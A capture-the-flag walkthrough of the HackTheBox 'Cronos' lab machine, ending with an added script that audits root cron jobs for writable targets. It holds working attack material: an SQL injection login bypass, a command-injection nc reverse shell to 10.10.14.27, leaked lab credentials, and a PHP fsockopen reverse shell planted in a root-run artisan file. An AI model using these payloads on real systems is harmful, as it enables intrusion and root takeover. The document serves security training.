# Cronos

### Port Scanning

```bash
naabu -host cronos.htb

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[INF] Found 3 ports on host cronos.htb (10.10.10.13)
cronos.htb:53
cronos.htb:80
cronos.htb:22

```

**Open ports**

* Port 53: DNS
* Port 80: HTTP (default Apache page)
* Port 22: SSH

### Checking for DNS Zone Transfer

```bash
dig axfr cronos.htb @10.10.10.13

; <<>> DiG 9.18.8-1-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 35 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Fri Aug 25 02:35:57 +08 2023
;; XFR size: 7 records (messages 1, bytes 203)
```

**New subdomain**

```bash
# New subdomain found: admin.cronos.htb
# /etc/hosts entries take the form "IP hostname"
echo "10.10.10.13 admin.cronos.htb" >> /etc/hosts
```

### Foothold

**The login page is vulnerable to SQL injection**

`admin.cronos.htb`

```sql
'OR 1 OR'
```

After logging in successfully, the page is found to allow command execution:

```bash
8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.27 4567 >/tmp/f
```

* The input is `;` with the reverse shell command following it.

A config file is present in the current directory:

```bash
cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
```

Looking for users with a home directory:

```bash
cat /etc/passwd | grep home
syslog:x:104:108::/home/syslog:/bin/false
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
```

Looking at the database:

```sql
mysql -u admin -p admin

select * from users;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+
```

The SSH attempt was unsuccessful:

```bash
ssh noulis@cronos.htb

The authenticity of host 'cronos.htb (10.10.10.13)' can't be established.
ED25519 key fingerprint is SHA256:0QcWAcBsE48rtLkfUydRF2HmC1YqGFnb3VuTC0hLSK0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cronos.htb' (ED25519) to the list of known hosts.
noulis@cronos.htb's password: 
Permission denied, please try again.
noulis@cronos.htb's password: 
```

### Priv Esc

A cron job is found to run as root:

```bash
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
```

The `artisan` file is a PHP file and we have read and write access to it:

```bash
-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan
```

```bash
www-data@cronos:/var/www/laravel$ cat artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
```

Modified version:

```php
<?php
$sock=fsockopen("10.10.14.27",1234);exec("sh <&3 >&3 2>&3");
/*
```

Open a listener and wait for the connection to get a root shell:

```bash
nc -nlvp 1234

listening on [any] 1234 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.13] 54116

ls
root.txt
whoami
root

```
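
The weakness used in this section is a root cron entry that executes a file owned by `www-data`. The script below is an added example, not part of the original write-up: it lists the absolute paths named in root jobs of a system crontab and reports those that a non-root account could modify. The function names and the `make_fixture` helper (a constructed test crontab) are assumptions made for this example.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up.
# Usage: bash audit_root_cron.sh /etc/crontab

# Print the absolute paths named in commands that run as root.
root_cron_paths() {
  awk '
    /^[ \t]*(#|$)/ { next }                      # comments and blank lines
    $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }     # SHELL=, PATH=, ...
    {
      u = ($1 ~ /^@/) ? 2 : 6                    # @reboot form or five time fields
      if ($u != "root") next
      for (i = u + 1; i <= NF; i++) {
        gsub(/[()";]/, "", $i)                   # strip shell punctuation
        if ($i ~ /^\// && $i !~ /^\/dev\//) print $i
      }
    }' "$1" | sort -u
}

# Report each such path, and its parent directory, that is not owned by
# root (uid 0) or is group/world-writable: whoever can write it decides
# what the root job executes.
audit_root_cron() {
  root_cron_paths "$1" | while IFS= read -r p; do
    [ -e "$p" ] || continue
    find -H "$p" "$(dirname "$p")" -prune \
      \( ! -user 0 -o -perm -020 -o -perm -002 \) -print
  done | sort -u
}

# Constructed fixture: a root job pointing at a world-writable file and a
# www-data job that the audit must ignore. Prints the fixture directory.
make_fixture() (
  d=$(mktemp -d)
  : > "$d/artisan";  chmod 777 "$d/artisan"
  : > "$d/other.sh"; chmod 777 "$d/other.sh"
  printf '%s\n' 'SHELL=/bin/sh' '# m h dom mon dow user command' \
    "* * * * * root php $d/artisan schedule:run >> /dev/null 2>&1" \
    "* * * * * www-data $d/other.sh" > "$d/crontab"
  echo "$d"
)

if [ -n "${1:-}" ]; then audit_root_cron "$1"; fi
```

Any path it prints should be owned by root and not writable by group or others, or the job should run as the unprivileged user that owns the file.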

